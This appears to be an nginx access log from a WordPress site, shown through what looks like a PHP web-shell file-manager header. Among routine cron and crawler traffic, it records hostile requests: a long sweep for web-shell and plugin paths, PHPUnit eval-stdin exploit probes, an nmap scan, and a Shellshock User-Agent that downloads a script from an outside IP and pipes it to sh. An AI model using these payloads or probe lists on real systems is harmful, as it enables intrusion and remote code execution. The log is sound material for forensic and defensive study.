HEX
Server: nginx/1.16.1
System: Linux ecs-04358622 4.19.90-2107.6.0.0100.oe1.bclinux.x86_64 #1 SMP Wed Dec 1 19:59:44 CST 2021 x86_64
User: nginx (994)
PHP: 8.0.0
Disabled: NONE
Upload Files
File: /home/logs/cqqizhou_access_2026-01-18.log
36.133.115.36 - - [18/Jan/2026:00:15:17 +0800] "POST /wp-cron.php?doing_wp_cron=1768666517.7217769622802734375000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
193.142.147.209 - - [18/Jan/2026:00:15:18 +0800] "POST / HTTP/1.1" 200 34744 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [18/Jan/2026:00:17:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768666643.2174119949340820312500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
112.45.204.71 - - [18/Jan/2026:00:17:23 +0800] "GET /Ly9jcXFpemhvdS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMjYvMDEvMTc2ODI4MDI3MC1hbnF1YW5fU2xpZGVyXzM4NDDDlzIxNjBfMjAyNjAxMTQtc2NhbGVkLndlYnA= HTTP/1.1" 404 8949 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.40"
36.133.115.36 - - [18/Jan/2026:00:20:54 +0800] "POST /wp-cron.php?doing_wp_cron=1768666854.3283989429473876953125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [18/Jan/2026:00:20:54 +0800] "GET / HTTP/1.1" 200 34744 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Jan/2026:00:23:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768667038.9248239994049072265625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
38.46.221.123 - - [18/Jan/2026:00:23:58 +0800] "GET http://check.9tb.org/ HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
38.46.221.123 - - [18/Jan/2026:00:23:59 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 40643 "http://check.9tb.org" "Go-http-client/1.1"
36.133.115.36 - - [18/Jan/2026:00:28:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768667294.4488110542297363281250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
182.138.191.45 - - [18/Jan/2026:00:28:14 +0800] "GET /Ly9jcXFpemhvdS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMjYvMDEvMTc2ODI3NjExOS1xaXpob3VqaWFnb25nX1NsaWRlcl8zODQww5cyMTYwXzIwMjYwMTEzLXNjYWxlZC53ZWJw HTTP/1.1" 404 8952 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.30"
36.133.115.36 - - [18/Jan/2026:00:34:12 +0800] "POST /wp-cron.php?doing_wp_cron=1768667652.5785560607910156250000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.8 - - [18/Jan/2026:00:34:12 +0800] "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
204.76.203.8 - - [18/Jan/2026:00:34:13 +0800] "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1" 404 8951 "http://36.133.115.36:80/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
92.222.108.97 - - [18/Jan/2026:00:48:22 +0800] "GET /2159/ HTTP/1.1" 200 28572 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.196.88.31 - - [18/Jan/2026:00:48:49 +0800] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:49 +0800] "GET /assets/images/hehe.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:49 +0800] "GET /wp-conter.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:49 +0800] "GET /ua/index_old.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:49 +0800] "GET /wp-content/themes/seotheme/radio.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:49 +0800] "GET /wp-admin/js/upgrade.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:49 +0800] "GET /wp-adminmaintmailer.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:49 +0800] "GET /en/wp-login.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:50 +0800] "GET /ru/adminer-4.2.4.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:50 +0800] "GET /assets/uploads/alfacgiapi/404.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:50 +0800] "GET /test/adminer-4.6.1-mysql-en.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:51 +0800] "GET /hvoxejcn.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:51 +0800] "GET /rasp.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:51 +0800] "GET /sk-park.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:51 +0800] "GET /wp-includes/functions.php HTTP/1.1" 200 12 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:51 +0800] "GET /wp-content/plugins/convertplug/convertplug.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:51 +0800] "GET /wp-content/plugins/cdekdelivery/cdek.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:51 +0800] "GET /wp-settings.php HTTP/1.1" 500 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:51 +0800] "GET /wp-includes/pluggable.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:52 +0800] "GET /flexoacademy.com/wp-includes/class-wp-hook.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:52 +0800] "GET /app/Http/Controllers/ContactController.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [18/Jan/2026:00:48:52 +0800] "POST /wp-cron.php?doing_wp_cron=1768668532.9665629863739013671875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
20.196.88.31 - - [18/Jan/2026:00:48:53 +0800] "GET /index.php HTTP/1.1" 301 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:53 +0800] "GET / HTTP/1.1" 200 171342 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:53 +0800] "GET /resources/views/layouts/main.blade.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:53 +0800] "GET /storage/framework/views/82a7b40d8e135fd3ca9cce3df185adac.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:53 +0800] "GET /storage/framework/views/4f035e85688eb1f99ecbf0a343e8dc14.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:54 +0800] "GET /app/Http/Controllers/CaptchaController.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:54 +0800] "GET /analyze_08/analyze.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:54 +0800] "GET /newsite/wp-includes/functions.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:54 +0800] "GET /newsite/wp-admin/includes/misc.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:54 +0800] "GET /newsite/wp-admin/admin-header.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:54 +0800] "GET /wp-includes/update.php HTTP/1.1" 200 12 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:55 +0800] "GET /wp-content/themes/autoloader.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:55 +0800] "GET /wp-content/themes/r-and-t/functions.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:55 +0800] "GET /wp-admin/includes/theme.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:56 +0800] "GET /wp-blog-header.php HTTP/1.1" 404 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:57 +0800] "GET /wp-load.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:58 +0800] "GET /wp-config.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:58 +0800] "GET /wp-includes/template-loader.php HTTP/1.1" 500 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:58 +0800] "GET /themes/onepress/home.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:58 +0800] "GET /themes/child/header.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:58 +0800] "GET /themes/onepress/single.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:58 +0800] "GET /themes/onepress/archive.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:59 +0800] "GET /themes/onepress/page.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:59 +0800] "GET /cloner/websocket.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:59 +0800] "GET /mu-plugins/0-worker.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:59 +0800] "GET /plugins/worker/init.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:48:59 +0800] "GET /themes/onepress/sidebar.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:00 +0800] "GET /wp-login.php HTTP/1.1" 200 9053 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:00 +0800] "GET /wp-includes/wp-db.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:00 +0800] "GET /wp-includes/class-wp-query.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:00 +0800] "GET /ABSPATHwp-includes/version.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:00 +0800] "GET /wp-includes/class-wp-customize-widgets.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:01 +0800] "GET /wp-content/themes/Lisli_Emi/header.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:01 +0800] "GET /plugins/duplicator/uninstall.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:01 +0800] "GET /wp-includes/class-wpdb.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:01 +0800] "GET /wp-includes/canonical.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:01 +0800] "GET /wp-content/plugins/ozh-click-counter/wp_ozh_clickcounter.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:02 +0800] "GET /wp-includes/class-wp-hook.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:02 +0800] "GET /wp-includes/plugin.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:02 +0800] "GET /wp-includes/formatting.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:02 +0800] "GET /wp-includes/post-template.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:02 +0800] "GET /wp-content/plugins/search-filter/search-filter.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:02 +0800] "GET /wp-includes/template.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:02 +0800] "GET /wp-includes/general-template.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:03 +0800] "GET /wp-content/plugins/w3-total-cache/PgCache_ContentGrabber.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:03 +0800] "GET /themes/flash/page.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:03 +0800] "GET /themes/flash/header.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:03 +0800] "GET /wer.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:03 +0800] "GET /crouter.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:04 +0800] "GET /sites/default/composer.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:04 +0800] "GET /COPYRIGHT.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:04 +0800] "GET /sites/default/settingsm.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:04 +0800] "GET /wp-admin/includes/class-wp-upgrader-skin.php HTTP/1.1" 200 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:04 +0800] "GET /lanceros.es/wp-settings.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:04 +0800] "GET /lanceros.es/wp-config.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:04 +0800] "GET /ABSPATHwp-includes/load.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:05 +0800] "GET /lanceros.es/wp-admin/includes/update-core.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:05 +0800] "GET /themes/twentyfourteen/index.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:05 +0800] "GET /themes/twentyfourteen/sidebar.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:05 +0800] "GET /themes/twentyfourteen/page.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:05 +0800] "GET /themes/twentyfourteen/single.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:05 +0800] "GET /themes/twentyfourteen/author.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:05 +0800] "GET /themes/twentyfourteen/404.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:05 +0800] "GET /themes/twentyfourteen/tag.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:06 +0800] "GET /lanceros.es/wp-includes/class-wp-xmlrpc-server.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:06 +0800] "GET /admin-ajax.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:06 +0800] "GET /themes.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:06 +0800] "GET /profile.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:06 +0800] "GET /admin.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:06 +0800] "GET /wp-content/plugins/php-compatibility-checker/wpengine-phpcompat.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:07 +0800] "GET /usr/share/phpmyadmin/server_import.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:12 +0800] "GET /wp-admin/plugins.php HTTP/1.1" 302 5 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:13 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Fplugins.php&reauth=1 HTTP/1.1" 200 9064 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:13 +0800] "GET /bocabravaproperties.com/wp-includes/compat.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:13 +0800] "GET /ability-tw.com/wp-settings.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:13 +0800] "GET /w/index.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:13 +0800] "GET /w/content/tracking.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:14 +0800] "GET /w/app/core/assist.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:14 +0800] "GET /w/app/core/basic.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:16 +0800] "GET /w/app/core/full.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:16 +0800] "GET /w/app/core/extensions.php HTTP/1.1" 404 27 "-" "-"
20.196.88.31 - - [18/Jan/2026:00:49:16 +0800] "GET /w/corrected.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [18/Jan/2026:00:51:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768668662.9594960212707519531250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.6 - - [18/Jan/2026:00:51:03 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Jan/2026:00:52:41 +0800] "POST /wp-cron.php?doing_wp_cron=1768668761.9366209506988525390625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.153.107.22 - - [18/Jan/2026:00:52:41 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.107.22 - - [18/Jan/2026:00:52:44 +0800] "GET / HTTP/1.1" 200 34745 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.159.99.95 - - [18/Jan/2026:00:57:46 +0800] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [18/Jan/2026:00:57:47 +0800] "GET / HTTP/1.1" 499 0 "-" "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io"
36.133.115.36 - - [18/Jan/2026:00:57:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768669068.4126729965209960937500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
192.159.99.95 - - [18/Jan/2026:00:57:49 +0800] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [18/Jan/2026:00:57:49 +0800] "GET / HTTP/1.1" 499 0 "-" "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io"
36.133.115.36 - - [18/Jan/2026:01:11:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768669919.3020350933074951171875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [18/Jan/2026:01:11:59 +0800] "GET / HTTP/1.1" 200 34745 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Jan/2026:01:16:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768670183.3849189281463623046875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
49.51.183.84 - - [18/Jan/2026:01:16:23 +0800] "GET /wp-content/uploads/2025/07/1753453127- HTTP/1.1" 404 8950 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:01:22:07 +0800] "POST /wp-cron.php?doing_wp_cron=1768670527.2214241027832031250000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.159.149.216 - - [18/Jan/2026:01:22:07 +0800] "GET / HTTP/1.1" 200 34744 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:01:23:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768670602.7493619918823242187500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
20.65.195.51 - - [18/Jan/2026:01:23:22 +0800] "GET /portal/redlion HTTP/1.1" 404 8950 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [18/Jan/2026:01:27:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768670876.0770881175994873046875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
150.109.46.88 - - [18/Jan/2026:01:27:56 +0800] "GET /portfolio-category/remaining-rolls/ HTTP/1.1" 200 17650 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:01:28:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768670938.5448300838470458984375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
5.61.209.92 - - [18/Jan/2026:01:28:58 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Jan/2026:01:30:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768671002.7722880840301513671875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
87.121.84.37 - - [18/Jan/2026:01:30:03 +0800] "GET / HTTP/1.1" 200 157416 "-" "-"
36.133.115.36 - - [18/Jan/2026:01:34:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768671280.4978599548339843750000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
38.46.221.123 - - [18/Jan/2026:01:34:40 +0800] "GET http://check.9tb.org/ HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
38.46.221.123 - - [18/Jan/2026:01:34:41 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 40643 "http://check.9tb.org" "Go-http-client/1.1"
36.133.115.36 - - [18/Jan/2026:01:37:06 +0800] "POST /wp-cron.php?doing_wp_cron=1768671426.6360869407653808593750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.135.36.201 - - [18/Jan/2026:01:37:06 +0800] "GET / HTTP/1.1" 200 34745 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:01:47:34 +0800] "POST /wp-cron.php?doing_wp_cron=1768672054.5529520511627197265625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.153.10.13 - - [18/Jan/2026:01:47:34 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F HTTP/1.1" 200 1128 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:01:52:11 +0800] "POST /wp-cron.php?doing_wp_cron=1768672331.1963980197906494140625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
170.64.222.249 - - [18/Jan/2026:01:52:11 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.222.249 - - [18/Jan/2026:01:52:13 +0800] "GET / HTTP/1.1" 200 40643 "http://36.133.115.36/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.222.249 - - [18/Jan/2026:01:52:15 +0800] "GET /form.html HTTP/1.1" 404 8951 "-" "curl/8.1.2"
170.64.222.249 - - [18/Jan/2026:01:52:15 +0800] "GET /upl.php HTTP/1.1" 404 47 "-" "Mozilla/5.0"
170.64.222.249 - - [18/Jan/2026:01:52:16 +0800] "GET /t4 HTTP/1.1" 404 8951 "-" "Mozilla/5.0"
170.64.222.249 - - [18/Jan/2026:01:52:17 +0800] "GET /geoip/ HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.222.249 - - [18/Jan/2026:01:52:18 +0800] "GET /1.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.222.249 - - [18/Jan/2026:01:52:18 +0800] "GET /systembc/password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.222.249 - - [18/Jan/2026:01:52:18 +0800] "GET /password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
36.133.115.36 - - [18/Jan/2026:01:57:21 +0800] "POST /wp-cron.php?doing_wp_cron=1768672640.9914469718933105468750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.153.123.3 - - [18/Jan/2026:01:57:21 +0800] "GET /wp-content/uploads/2025/07/1753456770- HTTP/1.1" 404 8949 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:02:07:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768673242.7532289028167724609375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [18/Jan/2026:02:07:22 +0800] "GET / HTTP/1.1" 200 34745 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Jan/2026:02:15:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768673759.8693609237670898437500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
112.124.56.43 - - [18/Jan/2026:02:15:59 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
112.124.56.43 - - [18/Jan/2026:02:16:10 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
112.124.56.43 - - [18/Jan/2026:02:16:10 +0800] "GET /nmaplowercheck1768673763 HTTP/1.1" 404 31367 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
